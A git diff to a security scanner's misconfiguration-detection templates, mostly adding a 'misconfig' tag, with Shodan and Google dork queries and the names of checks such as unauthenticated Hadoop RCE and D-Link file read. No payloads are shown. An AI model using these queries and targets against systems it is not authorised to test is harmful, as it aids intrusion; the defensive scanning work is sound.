tags: aem,adobe,hackerone + tags: aem,adobe,hackerone,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml index 61dc859dbf..4abc85a9d4 100644 --- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - raw: diff --git a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml index 91c8087b7c..4ea13fe428 100644 --- a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - raw: diff --git a/http/misconfiguration/aem/aem-login-status.yaml b/http/misconfiguration/aem/aem-login-status.yaml index 8393ee2e20..5af880a1e1 100644 --- a/http/misconfiguration/aem/aem-login-status.yaml +++ b/http/misconfiguration/aem/aem-login-status.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 3 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml index 3b045574b5..bee5558021 100644 --- a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml +++ b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml index 3910d86c30..dd214075fb 100644 --- a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index 01de38d0bd..1f47753d65 100644 --- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 4 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml index e38378bea1..bf4a37db57 100644 --- a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 8 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-setpreferences-xss.yaml b/http/misconfiguration/aem/aem-setpreferences-xss.yaml index bbb19fc79a..84bc4968af 100644 --- a/http/misconfiguration/aem/aem-setpreferences-xss.yaml +++ b/http/misconfiguration/aem/aem-setpreferences-xss.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,xss + tags: aem,xss,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml index 3f5d7ec5aa..479715cbe0 100644 --- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,bruteforce + tags: aem,bruteforce,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml index ae5b2bcf20..b2c844c352 100644 --- a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml +++ b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml index dfe83f7ef8..9e41e8f418 100644 --- a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml +++ b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,aem,adobe + tags: xss,aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/airflow/airflow-debug.yaml b/http/misconfiguration/airflow/airflow-debug.yaml index e4d88616ff..c358cddb3d 100644 --- a/http/misconfiguration/airflow/airflow-debug.yaml +++ b/http/misconfiguration/airflow/airflow-debug.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,fpd + tags: apache,airflow,fpd,misconfig http: - method: GET diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml index abeec2b1ef..912f9839d8 100644 --- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml +++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 2 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth + tags: apache,airflow,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/akamai/akamai-arl-xss.yaml b/http/misconfiguration/akamai/akamai-arl-xss.yaml index 7a1059b150..ca6e5d1830 100644 --- a/http/misconfiguration/akamai/akamai-arl-xss.yaml +++ b/http/misconfiguration/akamai/akamai-arl-xss.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: akamai,xss + tags: akamai,xss,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml index 07ee7cafdb..508c487dd8 100644 --- a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml +++ b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -15,7 +15,8 @@ info: metadata: max-request: 204 verified: true - tags: cache,poisoning,generic,xss,akamai,s3 + tags: cache,poisoning,generic,xss,akamai,s3,misconfig + verified: "true" variables: rand: "{{rand_base(5)}}" diff --git a/http/misconfiguration/alibaba-mongoshake-unauth.yaml b/http/misconfiguration/alibaba-mongoshake-unauth.yaml index 6fda18783c..be12a07eec 100644 --- a/http/misconfiguration/alibaba-mongoshake-unauth.yaml +++ b/http/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -4,7 +4,7 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth,alibaba + tags: mongoshake,unauth,alibaba,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/android-debug-database-exposed.yaml b/http/misconfiguration/android-debug-database-exposed.yaml index de94ca3ddc..9c82f59f5b 100644 --- a/http/misconfiguration/android-debug-database-exposed.yaml +++ b/http/misconfiguration/android-debug-database-exposed.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Android Debug Database" - tags: unauth,android + tags: unauth,android,misconfig http: - method: GET diff --git a/http/misconfiguration/apache/tomcat-pathnormalization.yaml b/http/misconfiguration/apache/tomcat-pathnormalization.yaml index 4909cfea93..50e48010cc 100644 --- a/http/misconfiguration/apache/tomcat-pathnormalization.yaml +++ b/http/misconfiguration/apache/tomcat-pathnormalization.yaml @@ -10,7 +10,7 @@ info: cvss-score: 0.0 cwe-id: CWE-200 reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - tags: panel,tomcat,apache + tags: panel,tomcat,apache,misconfig metadata: max-request: 6 diff --git a/http/misconfiguration/apc-info.yaml b/http/misconfiguration/apc-info.yaml index d832c9d1b2..0813cc01f1 100644 --- a/http/misconfiguration/apc-info.yaml +++ b/http/misconfiguration/apc-info.yaml @@ -4,7 +4,7 @@ info: name: APCu service information leakage author: koti2 severity: low - tags: config,service,apcu + tags: config,service,apcu,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/artifactory-anonymous-deploy.yaml b/http/misconfiguration/artifactory-anonymous-deploy.yaml index c3ee7408d2..741cb217f2 100644 --- a/http/misconfiguration/artifactory-anonymous-deploy.yaml +++ b/http/misconfiguration/artifactory-anonymous-deploy.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://www.errno.fr/artifactory/Attacking_Artifactory.html - tags: artifactory + tags: artifactory,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/aspx-debug-mode.yaml b/http/misconfiguration/aspx-debug-mode.yaml index b47a4852ee..70e7f1c8fa 100644 --- a/http/misconfiguration/aspx-debug-mode.yaml +++ b/http/misconfiguration/aspx-debug-mode.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled - tags: debug + tags: debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/aws-redirect.yaml b/http/misconfiguration/aws-redirect.yaml index 1520d7ee95..2e5eb32973 100644 --- a/http/misconfiguration/aws-redirect.yaml +++ b/http/misconfiguration/aws-redirect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover + tags: aws,takeover,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/blackbox-exporter-metrics.yaml b/http/misconfiguration/blackbox-exporter-metrics.yaml index 08facccbc4..ebeb32639e 100644 --- a/http/misconfiguration/blackbox-exporter-metrics.yaml +++ b/http/misconfiguration/blackbox-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Blackbox Exporter" - tags: blackbox,exposure,debug + tags: blackbox,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/browserless-debugger.yaml b/http/misconfiguration/browserless-debugger.yaml index d3e7f54a0f..45dd151d83 100644 --- a/http/misconfiguration/browserless-debugger.yaml +++ b/http/misconfiguration/browserless-debugger.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"browserless debugger" - tags: browserless,unauth,debug + tags: browserless,unauth,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/cgi-test-page.yaml b/http/misconfiguration/cgi-test-page.yaml index 7193d1cfb1..057963450b 100644 --- a/http/misconfiguration/cgi-test-page.yaml +++ b/http/misconfiguration/cgi-test-page.yaml @@ -4,7 +4,7 @@ info: name: CGI Test page author: YASH ANAND @yashanand155 severity: info - tags: cgi + tags: cgi,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/clockwork-dashboard-exposure.yaml b/http/misconfiguration/clockwork-dashboard-exposure.yaml index 402f6bc4ac..e920d4ecb8 100644 --- a/http/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/http/misconfiguration/clockwork-dashboard-exposure.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json - tags: exposure,unauth + tags: exposure,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/cluster-panel.yaml b/http/misconfiguration/cluster-panel.yaml index 22170a3909..f9b3b042e7 100644 --- a/http/misconfiguration/cluster-panel.yaml +++ b/http/misconfiguration/cluster-panel.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Cluster Overview - Trino" - tags: cluster,unauth,trino + tags: cluster,unauth,trino,misconfig http: - method: POST diff --git a/http/misconfiguration/collectd-exporter-metrics.yaml b/http/misconfiguration/collectd-exporter-metrics.yaml index 9135317f25..499911533b 100644 --- a/http/misconfiguration/collectd-exporter-metrics.yaml +++ b/http/misconfiguration/collectd-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Collectd Exporter" - tags: collectd,exposure,debug + tags: collectd,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/command-api-explorer.yaml b/http/misconfiguration/command-api-explorer.yaml index 6cbbb0649c..b36d832462 100644 --- a/http/misconfiguration/command-api-explorer.yaml +++ b/http/misconfiguration/command-api-explorer.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Command API Explorer" - tags: panel + tags: panel,misconfig http: - method: GET diff --git a/http/misconfiguration/cx-cloud-upload-detect.yaml b/http/misconfiguration/cx-cloud-upload-detect.yaml index 081c0125fd..527294457c 100644 --- a/http/misconfiguration/cx-cloud-upload-detect.yaml +++ b/http/misconfiguration/cx-cloud-upload-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: fileupload + tags: fileupload,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/d-link-arbitary-fileread.yaml b/http/misconfiguration/d-link-arbitary-fileread.yaml index fd0fe637f7..94042e2233 100644 --- a/http/misconfiguration/d-link-arbitary-fileread.yaml +++ b/http/misconfiguration/d-link-arbitary-fileread.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: dlink,lfi + tags: dlink,lfi,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml index 0574888a20..9395cd343d 100644 --- a/http/misconfiguration/debug/bottle-debug.yaml +++ b/http/misconfiguration/debug/bottle-debug.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"Sorry, the requested URL" - tags: bottle,exposure,debug + tags: bottle,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index a2eac45b7d..2c939b53ab 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Werkzeug powered traceback interpreter" - tags: werkzeug,exposure,debug + tags: werkzeug,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/deos-openview-admin.yaml b/http/misconfiguration/deos-openview-admin.yaml index 74ab263d67..6d905b255b 100644 --- a/http/misconfiguration/deos-openview-admin.yaml +++ b/http/misconfiguration/deos-openview-admin.yaml @@ -10,7 +10,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-284 - tags: openview,disclosure,panel + tags: openview,disclosure,panel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index 5ac3622841..cef5ec1226 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dgraph Ratel Dashboard" - tags: exposure,unauth,panel + tags: exposure,unauth,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/django-debug-detect.yaml b/http/misconfiguration/django-debug-detect.yaml index f9d7052e6d..5d1a6e29c5 100644 --- a/http/misconfiguration/django-debug-detect.yaml +++ b/http/misconfiguration/django-debug-detect.yaml @@ -4,7 +4,7 @@ info: name: Django Debug Method Enabled author: dhiyaneshDK,hackergautam severity: medium - tags: django,debug + tags: django,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/druid-monitor.yaml b/http/misconfiguration/druid-monitor.yaml index 52ca2252e0..44fe11b5b3 100644 --- a/http/misconfiguration/druid-monitor.yaml +++ b/http/misconfiguration/druid-monitor.yaml @@ -4,7 +4,7 @@ info: name: Druid Monitor Unauthorized Access author: ohlinge severity: high - tags: druid,unauth + tags: druid,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml index 097980ca0f..d8e7f68c75 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 4 shodan-query: http.component:"drupal" - tags: drupal + tags: drupal,misconfig http: - method: GET diff --git a/http/misconfiguration/elasticsearch.yaml b/http/misconfiguration/elasticsearch.yaml index 9ff60652b9..8348ba6b27 100644 --- a/http/misconfiguration/elasticsearch.yaml +++ b/http/misconfiguration/elasticsearch.yaml @@ -8,7 +8,7 @@ info: max-request: 4 verified: true shodan-query: "ElasticSearch" - tags: elastic,unauth,elasticsearch + tags: elastic,unauth,elasticsearch,misconfig http: - method: GET diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml index 1aabbb6c3a..a2850b27d0 100644 --- a/http/misconfiguration/everything-listing.yaml +++ b/http/misconfiguration/everything-listing.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: 'true' shodan-query: http.favicon.hash:-977323269 - tags: exposure,everything,listing,voidtools + tags: exposure,everything,listing,voidtools,misconfig http: - method: GET diff --git a/http/misconfiguration/exposed-docker-api.yaml b/http/misconfiguration/exposed-docker-api.yaml index 68f54725b4..c39bad0fe9 100644 --- a/http/misconfiguration/exposed-docker-api.yaml +++ b/http/misconfiguration/exposed-docker-api.yaml @@ -4,7 +4,7 @@ info: name: Exposed Docker API author: furkansenan,dwisiswant0 severity: info - tags: docker,unauth,devops + tags: docker,unauth,devops,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/exposed-jquery-file-upload.yaml b/http/misconfiguration/exposed-jquery-file-upload.yaml index e362fde4da..01fb075db6 100644 --- a/http/misconfiguration/exposed-jquery-file-upload.yaml +++ b/http/misconfiguration/exposed-jquery-file-upload.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-434 - tags: exposure,jquery,edb + tags: exposure,jquery,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/exposed-kibana.yaml b/http/misconfiguration/exposed-kibana.yaml index 30828dd4dd..603e53f73e 100644 --- a/http/misconfiguration/exposed-kibana.yaml +++ b/http/misconfiguration/exposed-kibana.yaml @@ -4,7 +4,7 @@ info: name: Exposed Kibana author: Shine severity: medium - tags: kibana,unauth + tags: kibana,unauth,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/git-web-interface.yaml b/http/misconfiguration/git-web-interface.yaml index 9934fa8b2e..39f620ad75 100644 --- a/http/misconfiguration/git-web-interface.yaml +++ b/http/misconfiguration/git-web-interface.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: html:"git web interface version" - tags: git + tags: git,misconfig http: - method: GET diff --git a/http/misconfiguration/grafana-public-signup.yaml b/http/misconfiguration/grafana-public-signup.yaml index 825e2e6afc..b8632e8f1c 100644 --- a/http/misconfiguration/grafana-public-signup.yaml +++ b/http/misconfiguration/grafana-public-signup.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Grafana" - tags: grafana,intrusive + tags: grafana,intrusive,misconfig http: - raw: diff --git a/http/misconfiguration/graphql/graphql-alias-batching.yaml b/http/misconfiguration/graphql/graphql-alias-batching.yaml index 1200686f9a..d4a9d59006 100644 --- a/http/misconfiguration/graphql/graphql-alias-batching.yaml +++ b/http/misconfiguration/graphql/graphql-alias-batching.yaml @@ -14,7 +14,7 @@ info: - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin remediation: | Limit queries aliasing in your GraphQL Engine to ensure mitigation of aliasing-based attacks. - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/graphql/graphql-array-batching.yaml b/http/misconfiguration/graphql/graphql-array-batching.yaml index 41a4172586..77916bf92b 100644 --- a/http/misconfiguration/graphql/graphql-array-batching.yaml +++ b/http/misconfiguration/graphql/graphql-array-batching.yaml @@ -13,7 +13,7 @@ info: - https://graphql.security/ remediation: | Deactivate or limit Batching in your GraphQL engine. - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/graphql/graphql-field-suggestion.yaml b/http/misconfiguration/graphql/graphql-field-suggestion.yaml index 2dee50b0d2..f87901f0ee 100644 --- a/http/misconfiguration/graphql/graphql-field-suggestion.yaml +++ b/http/misconfiguration/graphql/graphql-field-suggestion.yaml @@ -13,7 +13,7 @@ info: - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/graphql/graphql-get-method.yaml b/http/misconfiguration/graphql/graphql-get-method.yaml index 6da3f76f68..fc02bf4c64 100644 --- a/http/misconfiguration/graphql/graphql-get-method.yaml +++ b/http/misconfiguration/graphql/graphql-get-method.yaml @@ -12,7 +12,7 @@ info: - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security/ - tags: graphql + tags: graphql,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/hadoop-unauth-rce.yaml b/http/misconfiguration/hadoop-unauth-rce.yaml index d3de67ca0e..8cd98fa234 100644 --- a/http/misconfiguration/hadoop-unauth-rce.yaml +++ b/http/misconfiguration/hadoop-unauth-rce.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-306 - tags: vulhub,apache,hadoop,unauth,rce,msf + tags: vulhub,apache,hadoop,unauth,rce,msf,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 70de63bbac..9e34eccc31 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"haproxy exporter" - tags: haproxy,exposure,debug + tags: haproxy,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/haproxy-status.yaml b/http/misconfiguration/haproxy-status.yaml index 349ed783eb..e622e5b989 100644 --- a/http/misconfiguration/haproxy-status.yaml +++ b/http/misconfiguration/haproxy-status.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: logs,haproxy,edb + tags: logs,haproxy,edb,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/hp/unauthorized-hp-printer.yaml b/http/misconfiguration/hp/unauthorized-hp-printer.yaml index bc9f62bcac..917bd960d3 100644 --- a/http/misconfiguration/hp/unauthorized-hp-printer.yaml +++ b/http/misconfiguration/hp/unauthorized-hp-printer.yaml @@ -4,7 +4,7 @@ info: name: Unauthorized HP Printer author: pussycat0x severity: high - tags: hp,iot,unauth + tags: hp,iot,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/hp/unauthorized-printer-hp.yaml b/http/misconfiguration/hp/unauthorized-printer-hp.yaml index e06a6b0b29..86633efd7a 100644 --- a/http/misconfiguration/hp/unauthorized-printer-hp.yaml +++ b/http/misconfiguration/hp/unauthorized-printer-hp.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"Hp Officejet pro" - tags: hp,iot,unauth + tags: hp,iot,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/hpe-system-management-anonymous.yaml b/http/misconfiguration/hpe-system-management-anonymous.yaml index 31c1ab9f34..7beaed5ce1 100644 --- a/http/misconfiguration/hpe-system-management-anonymous.yaml +++ b/http/misconfiguration/hpe-system-management-anonymous.yaml @@ -4,7 +4,7 @@ info: name: HPE System Management Anonymous Access author: divya_mudgal severity: low - tags: hp,unauth + tags: hp,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index e8a0d36430..60a408ba10 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 5 shodan-query: http.html:"IBM WebSphere Portal" - tags: ibm,exposure,websphere + tags: ibm,exposure,websphere,misconfig http: - method: GET diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index 32b7711d41..f57d8a4dfa 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -11,7 +11,8 @@ info: metadata: max-request: 1 verified: true - tags: ibm,websphere,exposure + tags: ibm,websphere,exposure,misconfig + verified: "true" http: - method: GET diff --git a/http/misconfiguration/installer/avideo-install.yaml b/http/misconfiguration/installer/avideo-install.yaml index 742b40bd98..9eaed6424b 100644 --- a/http/misconfiguration/installer/avideo-install.yaml +++ b/http/misconfiguration/installer/avideo-install.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.title:"AVideo" fofa-query: "AVideo" - tags: panel,install,avideo + tags: panel,install,avideo,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 209b17ed52..c867aede4c 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"- setup" html:"Modem setup" - tags: scada,circontrol,circarlife,setup,exposure,panel,installer + tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/getsimple-installation.yaml b/http/misconfiguration/installer/getsimple-installation.yaml index a34c6f4044..ba766a1e3c 100644 --- a/http/misconfiguration/installer/getsimple-installation.yaml +++ b/http/misconfiguration/installer/getsimple-installation.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-284 reference: - http://get-simple.info/ - tags: getsimple,exposure,installer + tags: getsimple,exposure,installer,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index 2df455cf73..0b5a4315ca 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Magnolia Installation" - tags: magnolia,exposure,installer + tags: magnolia,exposure,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index 3be5d1de66..376263daad 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mcloud-installer-web" - tags: panel,mcloud,exposure + tags: panel,mcloud,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/openshift-installer-panel.yaml b/http/misconfiguration/installer/openshift-installer-panel.yaml index 2c79773b0f..3b035b14bf 100644 --- a/http/misconfiguration/installer/openshift-installer-panel.yaml +++ b/http/misconfiguration/installer/openshift-installer-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"OpenShift Assisted Installer" - tags: panel,openshift,cluster + tags: panel,openshift,cluster,misconfig http: - method: GET diff --git a/http/misconfiguration/java-melody-exposed.yaml b/http/misconfiguration/java-melody-exposed.yaml index ace10f04ff..04f67db7f0 100644 --- a/http/misconfiguration/java-melody-exposed.yaml +++ b/http/misconfiguration/java-melody-exposed.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security - tags: config,java,javamelody + tags: config,java,javamelody,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jboss-status.yaml b/http/misconfiguration/jboss-status.yaml index 704f14789a..97df1c15c2 100644 --- a/http/misconfiguration/jboss-status.yaml +++ b/http/misconfiguration/jboss-status.yaml @@ -16,7 +16,7 @@ info: max-request: 1 verified: true google-query: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true - tags: jboss,unauth,edb + tags: jboss,unauth,edb,misconfig http: - 